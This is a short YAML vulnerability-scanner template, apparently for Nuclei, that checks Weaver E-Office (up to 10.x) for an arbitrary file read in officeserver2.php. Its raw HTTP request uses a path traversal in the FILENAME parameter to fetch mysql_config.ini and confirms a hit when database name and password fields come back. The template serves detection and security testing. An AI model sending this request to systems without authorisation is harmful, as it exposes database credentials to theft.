
id: CNVD-2022-07603

info:
  name: E-Office officeserver2 - Arbitray File Read
  author: qwtd
  severity: high
  description: |
    泛微EOffice <= 10.x officeserver2.php接口存在任意文件读取漏洞，攻击者可利用该漏洞读取任意文件。
  reference:
    - https://www.cnblogs.com/pursue-security/p/17775896.html
  tags: 泛微-EOffice

http:
  - raw:
      - |
        GET /iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "dataname = "
          - "datapassword ="

      - type: status
        status:
          - 200
